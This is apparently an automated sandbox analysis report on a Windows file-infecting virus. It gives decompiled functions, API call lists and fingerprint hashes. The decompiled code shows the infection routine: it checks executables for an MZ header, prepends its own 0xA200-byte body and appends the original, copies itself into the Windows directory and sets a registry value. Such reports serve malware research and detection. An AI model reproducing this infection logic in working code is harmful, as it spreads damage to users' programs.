                                                                                                                          										E00406510(_t175, _t86);
                                                                                                                          										E00405974();
                                                                                                                          										E00404198();
                                                                                                                          										E00405988(_t131);
                                                                                                                          										E00404520(_t131);
                                                                                                                          										E00404520(_t175);
                                                                                                                          										_t132 = E00404B68(_v8, 0xc0000303);
                                                                                                                          										if(_t103 != 0xffffffff) {
                                                                                                                          											E00404BC4(_t132, 2,  &_v41488);
                                                                                                                          											if(_v41488 == 0x4d && _v41487 == 0x5a) {
                                                                                                                          												E00404BB4(_t132, 0, 0);
                                                                                                                          												E00404BC4(_t132, 0xa200,  &_v41488);
                                                                                                                          												E0040254C( &_v40254, 4,  &_v16);
                                                                                                                          												E00407080( &_v41488, _v16, 0x3e8);
                                                                                                                          												E00404BB4(_t132, 0, 0);
                                                                                                                          												E00404BE0(_t132, 0xa200, 0x40a698);
                                                                                                                          												E00404BB4(_t132, 2, 0);
                                                                                                                          												E00404BE0(_t132, 0xa200,  &_v41488);
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										E00404B90(_t132);
                                                                                                                          										if((_t173 & 0x00000001) > 0) {
                                                                                                                          											SetFileAttributesA(E0040340C(_v8), _t173);
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L17;
                                                                                                                          				}
                                                                                                                          			}

























                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                                                                                            • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407461
                                                                                                                            • Part of subcall function 00404BC4: ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                                                                            • Part of subcall function 00404BB4: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                                                                            • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                                                                          • API String ID: 997383822-4093836345
                                                                                                                          • Opcode ID: 3325f7f34ba1cab3d3c53affcca57471aa0c7a6c0db11dbc350d39af7ef534dd
                                                                                                                          • Instruction ID: 377d96c4788612fdddee84976f6eb16641268004b287eb3b442383de46351668
                                                                                                                          • Opcode Fuzzy Hash: 3325f7f34ba1cab3d3c53affcca57471aa0c7a6c0db11dbc350d39af7ef534dd
                                                                                                                          • Instruction Fuzzy Hash: 71514370B042045BDB10FB6ACC82A8EB7A59F85308F1085BBB504B73D3DA7DEF454A5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00401788() {
                                                                                                                          				void* _t11;
                                                                                                                          				signed int _t13;
                                                                                                                          				intOrPtr _t19;
                                                                                                                          				void* _t20;
                                                                                                                          				intOrPtr _t23;
                                                                                                                          
                                                                                                                          				_push(_t23);
                                                                                                                          				_push(E0040183E);
                                                                                                                          				_push( *[fs:edx]);
                                                                                                                          				 *[fs:edx] = _t23;
                                                                                                                          				_push(0x40a5b4);
                                                                                                                          				L004010DC();
                                                                                                                          				if( *0x40a035 != 0) {
                                                                                                                          					_push(0x40a5b4);
                                                                                                                          					L004010E4();
                                                                                                                          				}
                                                                                                                          				E0040114C(0x40a5d4);
                                                                                                                          				E0040114C(0x40a5e4);
                                                                                                                          				E0040114C(0x40a610);
                                                                                                                          				_t11 = LocalAlloc(0, 0xff8); // executed
                                                                                                                          				 *0x40a60c = _t11;
                                                                                                                          				if( *0x40a60c != 0) {
                                                                                                                          					_t13 = 3;
                                                                                                                          					do {
                                                                                                                          						_t20 =  *0x40a60c; // 0x63f8a0
                                                                                                                          						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                                                                          						_t13 = _t13 + 1;
                                                                                                                          					} while (_t13 != 0x401);
                                                                                                                          					 *((intOrPtr*)(0x40a5f8)) = 0x40a5f4;
                                                                                                                          					 *0x40a5f4 = 0x40a5f4;
                                                                                                                          					 *0x40a600 = 0x40a5f4;
                                                                                                                          					 *0x40a5ac = 1;
                                                                                                                          				}
                                                                                                                          				_pop(_t19);
                                                                                                                          				 *[fs:eax] = _t19;
                                                                                                                          				_push(0x401845);
                                                                                                                          				if( *0x40a035 != 0) {
                                                                                                                          					_push(0x40a5b4);
                                                                                                                          					L004010EC();
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 730355536-0
                                                                                                                          • Opcode ID: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                                                                          • Instruction ID: b00ea9f5082304a52c30b3310984ccb38099dd734a88c9f27aa2559637ee1f83
                                                                                                                          • Opcode Fuzzy Hash: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                                                                          • Instruction Fuzzy Hash: 400184B0604380AEE715AF6A9D06B167BA4E749704F04C53FA140B66F2CA7D44A0CB5F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E00406B48(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                          				intOrPtr* _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				char _v28;
                                                                                                                          				struct _ICONINFO _v48;
                                                                                                                          				void* _t65;
                                                                                                                          				void* _t72;
                                                                                                                          				signed int _t81;
                                                                                                                          				intOrPtr* _t82;
                                                                                                                          				intOrPtr* _t85;
                                                                                                                          				void* _t98;
                                                                                                                          				void* _t99;
                                                                                                                          				intOrPtr _t103;
                                                                                                                          				intOrPtr _t104;
                                                                                                                          				signed int _t111;
                                                                                                                          				intOrPtr* _t112;
                                                                                                                          				intOrPtr _t116;
                                                                                                                          				intOrPtr _t117;
                                                                                                                          				void* _t118;
                                                                                                                          				void* _t119;
                                                                                                                          				void* _t120;
                                                                                                                          				void* _t121;
                                                                                                                          				void* _t124;
                                                                                                                          
                                                                                                                          				_v28 = 0;
                                                                                                                          				_v16 = __ecx;
                                                                                                                          				_v12 = __edx;
                                                                                                                          				_v8 = __eax;
                                                                                                                          				_push(_t124);
                                                                                                                          				_push(0x406c97);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t124 + 0xffffffd4;
                                                                                                                          				_t116 = _v12;
                                                                                                                          				if(_t116 < 0) {
                                                                                                                          					L8:
                                                                                                                          					_v24 = E00405968();
                                                                                                                          					_push(_v12 + 1 + _v12 + 1);
                                                                                                                          					E00403B24();
                                                                                                                          					_t117 = _v12;
                                                                                                                          					if(_t117 >= 0) {
                                                                                                                          						_t120 = _t117 + 1;
                                                                                                                          						_v20 = 0;
                                                                                                                          						_t85 = _v8;
                                                                                                                          						do {
                                                                                                                          							GetIconInfo( *( *_t85 + 0x1c),  &_v48);
                                                                                                                          							_t81 = _v20 + _v20;
                                                                                                                          							 *((intOrPtr*)(_v28 + _t81 * 4)) = _v48.hbmColor;
                                                                                                                          							 *((intOrPtr*)(_v28 + 4 + _t81 * 4)) = _v48.hbmMask;
                                                                                                                          							_v20 = _v20 + 1;
                                                                                                                          							_t85 = _t85 + 4;
                                                                                                                          							_t120 = _t120 - 1;
                                                                                                                          						} while (_t120 != 0);
                                                                                                                          					}
                                                                                                                          					_t65 = E00406638(_v28, _v16, E00403970()); // executed
                                                                                                                          					if(_t65 == 0) {
                                                                                                                          						E00405990(_v16);
                                                                                                                          					}
                                                                                                                          					_t118 = E00403970();
                                                                                                                          					if(_t118 >= 0) {
                                                                                                                          						_t119 = _t118 + 1;
                                                                                                                          						_v20 = 0;
                                                                                                                          						do {
                                                                                                                          							_t72 =  *(_v28 + _v20 * 4);
                                                                                                                          							if(_t72 != 0) {
                                                                                                                          								DeleteObject(_t72);
                                                                                                                          							}
                                                                                                                          							_v20 = _v20 + 1;
                                                                                                                          							_t119 = _t119 - 1;
                                                                                                                          						} while (_t119 != 0);
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t121 = _t116 + 1;
                                                                                                                          					_v20 = 0;
                                                                                                                          					_t82 = _v8;
                                                                                                                          					while( *((intOrPtr*)( *_t82 + 0x1c)) != 0) {
                                                                                                                          						_t111 = _v20 + 1;
                                                                                                                          						_t98 = _v12 - _t111;
                                                                                                                          						if(_t98 < 0) {
                                                                                                                          							L7:
                                                                                                                          							_v20 = _v20 + 1;
                                                                                                                          							_t82 = _t82 + 4;
                                                                                                                          							_t121 = _t121 - 1;
                                                                                                                          							if(_t121 != 0) {
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								goto L8;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							_t99 = _t98 + 1;
                                                                                                                          							_t112 = _v8 + _t111 * 4;
                                                                                                                          							while( *((intOrPtr*)( *_t82 + 0x18)) !=  *((intOrPtr*)( *_t112 + 0x18))) {
                                                                                                                          								_t112 = _t112 + 4;
                                                                                                                          								_t99 = _t99 - 1;
                                                                                                                          								if(_t99 != 0) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									goto L7;
                                                                                                                          								}
                                                                                                                          								goto L18;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L18;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L18:
                                                                                                                          				_pop(_t103);
                                                                                                                          				 *[fs:eax] = _t103;
                                                                                                                          				_push(E00406C9E);
                                                                                                                          				_t104 =  *0x406b28; // 0x406b2c
                                                                                                                          				return E00403B30( &_v28, _t104);
                                                                                                                          			}




























                                                                                                                          0x00406b7c
                                                                                                                          0x00406b7f
                                                                                                                          0x00406b8e
                                                                                                                          0x00406b92
                                                                                                                          0x00406b94
                                                                                                                          0x00406bb3
                                                                                                                          0x00406bb3
                                                                                                                          0x00406bb6
                                                                                                                          0x00406bb9
                                                                                                                          0x00406bba
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406b96
                                                                                                                          0x00406b96
                                                                                                                          0x00406b9a
                                                                                                                          0x00406b9d
                                                                                                                          0x00406bad
                                                                                                                          0x00406bb0
                                                                                                                          0x00406bb1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bb1
                                                                                                                          0x00406b9d
                                                                                                                          0x00000000
                                                                                                                          0x00406b94
                                                                                                                          0x00406b7f
                                                                                                                          0x00406c7b
                                                                                                                          0x00406c7d
                                                                                                                          0x00406c80
                                                                                                                          0x00406c83
                                                                                                                          0x00406c8b
                                                                                                                          0x00406c96

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteIconInfoObject
                                                                                                                          • String ID: ,k@
                                                                                                                          • API String ID: 2689914137-1053005162
                                                                                                                          • Opcode ID: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                                                                          • Instruction ID: dacdd831d29519e08e7e99a77df17fc26ef5cc856f0b9114ccf97923e4886ce8
                                                                                                                          • Opcode Fuzzy Hash: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                                                                          • Instruction Fuzzy Hash: 9F413AB0E0021A9FDB14DF99C881AAEBBB4FF48314F11407AD942B7391D734AE51CB98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E004078A6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                          				char* _t39;
                                                                                                                          				void* _t40;
                                                                                                                          				void* _t46;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				void* _t61;
                                                                                                                          
                                                                                                                          				_t60 = __esi;
                                                                                                                          				_t59 = __edi;
                                                                                                                          				_t46 = __ecx;
                                                                                                                          				_t45 = __ebx;
                                                                                                                          				E004049D0(0, __ebx, _t61 - 0xa244, __edi, __esi);
                                                                                                                          				E00404EEC(_t61 - 0xa240);
                                                                                                                          				SetCurrentDirectoryA(E0040340C( *((intOrPtr*)(_t61 - 0xa240)))); // executed
                                                                                                                          				_push(1);
                                                                                                                          				_push(0);
                                                                                                                          				E00406F34(1, __ebx, _t61 - 0xa248, __edi, __esi);
                                                                                                                          				_push(E0040340C( *((intOrPtr*)(_t61 - 0xa248))));
                                                                                                                          				E00405008(_t61 - 0xa250, _t45, _t46);
                                                                                                                          				E004031F4(_t61 - 0xa254, 9, 0x4091b4);
                                                                                                                          				E004049D0(0, _t45, _t61 - 0xa25c, _t59, _t60);
                                                                                                                          				E00404ED0( *((intOrPtr*)(_t61 - 0xa25c)), _t61 - 0xa258);
                                                                                                                          				E004032CC();
                                                                                                                          				_t39 = E0040340C( *((intOrPtr*)(_t61 - 0xa24c)));
                                                                                                                          				_t40 =  *0x40a650; // 0x400000
                                                                                                                          				ShellExecuteA(_t40, "open", _t39,  *(_t61 - 0xa258),  *(_t61 - 0xa254),  *(_t61 - 0xa250)); // executed
                                                                                                                          				_pop(_t57);
                                                                                                                          				 *[fs:eax] = _t57;
                                                                                                                          				_push(E00407993);
                                                                                                                          				return E004030B8(_t61 - 0xa25c, 0x14);
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 004078D0
                                                                                                                            • Part of subcall function 00405008: GetTempPathA.KERNEL32(00000105,?,00000000,00405072,?,00000000), ref: 00405036
                                                                                                                            • Part of subcall function 004049D0: GetCommandLineA.KERNEL32(00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000,?,00408179,00000000,00408220), ref: 00404A23
                                                                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00407969
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                                                                          • String ID: open
                                                                                                                          • API String ID: 2622400689-2758837156
                                                                                                                          • Opcode ID: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                                                                          • Instruction ID: bc53e8da7d6e16968f2b3cdc64b9b09c5d4ffb8ac025ca0eed744acd73de400d
                                                                                                                          • Opcode Fuzzy Hash: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                                                                          • Instruction Fuzzy Hash: 83113070B107198ADB10FB79CC41A8DB779FF85308F0085F6B108BB192D67E9E858E5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 51%
                                                                                                                          			E004079A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                          				char _v8;
                                                                                                                          				char _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v20;
                                                                                                                          				char _v24;
                                                                                                                          				char _v28;
                                                                                                                          				void* _t31;
                                                                                                                          				void* _t59;
                                                                                                                          				intOrPtr _t73;
                                                                                                                          				void* _t82;
                                                                                                                          				void* _t83;
                                                                                                                          				intOrPtr _t86;
                                                                                                                          
                                                                                                                          				_t83 = __esi;
                                                                                                                          				_t82 = __edi;
                                                                                                                          				_t54 = __ebx;
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(__ebx);
                                                                                                                          				_push(_t86);
                                                                                                                          				_push(0x407ac4);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t86;
                                                                                                                          				E00407080(0x4091e0, 0xb, 0xb);
                                                                                                                          				E004031F4( &_v12, 0xb, 0x4091e0);
                                                                                                                          				_push(_v12);
                                                                                                                          				E00404F90( &_v16, __ebx, 0xb);
                                                                                                                          				_pop(_t59);
                                                                                                                          				E00403258( &_v8, _t59, _v16);
                                                                                                                          				if(E00404B9C() != 0) {
                                                                                                                          					DeleteFileA(E0040340C(_v8));
                                                                                                                          				}
                                                                                                                          				_t31 = E00404BF8(E0040340C(_v8), _t54, 0xa200, 0x40a698, _t82, _t83); // executed
                                                                                                                          				if(_t31 != 0) {
                                                                                                                          					E00407080(0x4091ec, 0x1a, 0x1a);
                                                                                                                          					E004031F4( &_v20, 0x1a, 0x4091ec);
                                                                                                                          					_t55 = E0040575C(0x80000000, 0x1a, _v20);
                                                                                                                          					E00407080(0x409208, 8, 8);
                                                                                                                          					E004031F4( &_v28, 8, 0x409208);
                                                                                                                          					E00403258( &_v24, _v28, _v8);
                                                                                                                          					E0040578C(_t40, _v24, 0);
                                                                                                                          					E004057CC(_t55);
                                                                                                                          				}
                                                                                                                          				_pop(_t73);
                                                                                                                          				 *[fs:eax] = _t73;
                                                                                                                          				_push(E00407ACB);
                                                                                                                          				return E004030B8( &_v28, 6);
                                                                                                                          			}
















                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404F90: GetWindowsDirectoryA.KERNEL32(?,00000105,00000000,00404FFA,?,?,?,00407EB6,00000000,00408020,?,?,00000000,00000000,?,0040819C), ref: 00404FBE
                                                                                                                            • Part of subcall function 00404B9C: GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00407AC4,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408200,00000000,00408220), ref: 00407A0D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesDeleteDirectoryWindows
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 3550186980-2889622443
                                                                                                                          • Opcode ID: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                                                                          • Instruction ID: 69b580403c23d9cc841dfa7c227de2d2e2536c961132663fd28ad6461d03daee
                                                                                                                          • Opcode Fuzzy Hash: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                                                                          • Instruction Fuzzy Hash: 91212F70B04109ABDB04FAA5C85279F7B69EB85304F50847EA501BB3C2DF3CEE05976A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404BC4(void* __eax, long __ecx, void* __edx) {
                                                                                                                          				int _t2;
                                                                                                                          				void* _t3;
                                                                                                                          				DWORD* _t8;
                                                                                                                          
                                                                                                                          				_t2 = ReadFile(__eax, __edx, __ecx, _t8, 0); // executed
                                                                                                                          				_t3 = 0;
                                                                                                                          				if(_t2 == 0) {
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				return _t3;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 2738559852-2889622443
                                                                                                                          • Opcode ID: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                                                                          • Instruction ID: 3ae4d4c2ce5489376b9a0e409b07906e0c93d400668ceedc4e43a286d92feaa2
                                                                                                                          • Opcode Fuzzy Hash: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                                                                          • Instruction Fuzzy Hash: DEC04CA12582083AF51061A29C16F23355CC781799F12456AB704E51D1F096F81000A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404BE0(void* __eax, long __ecx, void* __edx) {
                                                                                                                          				int _t2;
                                                                                                                          				void* _t3;
                                                                                                                          				void* _t7;
                                                                                                                          				DWORD* _t9;
                                                                                                                          
                                                                                                                          				_t2 = WriteFile(__eax, __edx, __ecx, _t9, 0); // executed
                                                                                                                          				_t3 = _t7;
                                                                                                                          				if(_t2 == 0) {
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				return _t3;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 3934441357-2889622443
                                                                                                                          • Opcode ID: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                                                                          • Instruction ID: cd8d274a544879f86d75f83ceab2a9824fbef203ff2d66308718860d554d7d3d
                                                                                                                          • Opcode Fuzzy Hash: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                                                                          • Instruction Fuzzy Hash: 4EC04CA11582083AF51051A7AC06F233A5CC781698F114436BB08E1581F456F8011079
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00401788: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                                                                            • Part of subcall function 00401788: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                                                                            • Part of subcall function 00401788: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                                                                            • Part of subcall function 00401788: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401FF0), ref: 00401EBF
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401FF7), ref: 00401FEA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2227675388-0
                                                                                                                          • Opcode ID: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                                                                          • Instruction ID: c8d1828e50afdd1ef66478082c2fc5af823077db28515af4f228c2db3bc24797
                                                                                                                          • Opcode Fuzzy Hash: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                                                                          • Instruction Fuzzy Hash: 8A419BB2A043029FD714CF69DE81A2AB7B0FB59318B18827FD441E72F1D739A8518A49
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 61%
                                                                                                                          			E0040759C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                                          				char _v8;
                                                                                                                          				char _v12;
                                                                                                                          				void* _t11;
                                                                                                                          				void* _t17;
                                                                                                                          				void* _t32;
                                                                                                                          				intOrPtr _t38;
                                                                                                                          				void* _t44;
                                                                                                                          				void* _t46;
                                                                                                                          				intOrPtr _t49;
                                                                                                                          
                                                                                                                          				_t56 = __fp0;
                                                                                                                          				_t45 = __esi;
                                                                                                                          				_t48 = _t49;
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(__ebx);
                                                                                                                          				_push(__esi);
                                                                                                                          				_push(__edi);
                                                                                                                          				_push(_t49);
                                                                                                                          				_push(0x40765c);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t49; // executed
                                                                                                                          				_t11 = E00406E94(__ebx, __ecx, __edi, __esi, __eflags, __fp0); // executed
                                                                                                                          				if(_t11 != 0) {
                                                                                                                          					_t40 = 0x14;
